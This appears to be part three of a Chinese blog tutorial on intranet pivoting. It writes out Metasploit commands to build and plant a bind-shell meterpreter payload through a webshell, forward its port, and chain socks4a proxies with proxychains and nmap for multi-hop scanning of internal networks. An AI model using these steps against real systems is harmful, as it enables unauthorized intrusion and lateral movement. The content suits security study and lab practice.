”什么是内网穿透“详解( 三 )


新起一个终端:msf生成一个bindshell的木马(正向连接)
msfvenom -p linux/x86/meterpreter/bind_tcp lport=9999 -f elf -o bindshell放到通过webshell 放到/var/tmp/下加权限,启动

”什么是内网穿透“详解

文章插图
 
现在内网10.0.0.3在9999端口开启直接连shell权限,现在要做一个新的转发把10.0.0.3:9999端口转发到本地,然后msf直连
”什么是内网穿透“详解

文章插图
 
sessions sessions id编号meterpreter > portfwd add -L 127.0.0.1 -l 9999 -p 10.0.0.3 -r 9999
”什么是内网穿透“详解

文章插图
 
现在内网10.0.0.3的bindshell 9999 端口 转发到 本地127.0.0.1:9999端口了
msf进行直连shell
use exploit/multi/handlerset payload linux/x86/meterpreter/bind_tcpshow optionsset LPORT 9999set RHOST 127.0.0.1run
”什么是内网穿透“详解

文章插图
 
等待连接shell
”什么是内网穿透“详解

文章插图
 
反弹shell后,只需要在10.0.0.3的shell上
use auxiliary/server/socks4aset 127.0.0.1set srvport 1081run添加一个新隧道在/etc/proxychains.conf 中添加 socks4 127.0.0.1 1081
在proxychains nmap 扫描就是直接连接到10.0.0.3上进行转发扫描,内网二级穿透扫描
127.0.0.1:1080<>主站跳板跳板机<>10.0.0.3跳板机<>新ip(192.168.0.1)实现了双跳板机内网穿透,同样方法,要是拿到192.168.0.1的第三层内网,只需要之前的添加个端口转发到本地,就能继续渗透 。一般内网到第二层流量很少了,继续深层网段渗透就需要上 EW穿透神器等工具 。
总结一下流程,拿到webshell,上传木马反弹的msf,msf做socks4的代理然后添加端口转发,进行下一层渗透,第二层同样继续反弹shell,做代理,端口转发 。

【”什么是内网穿透“详解】


推荐阅读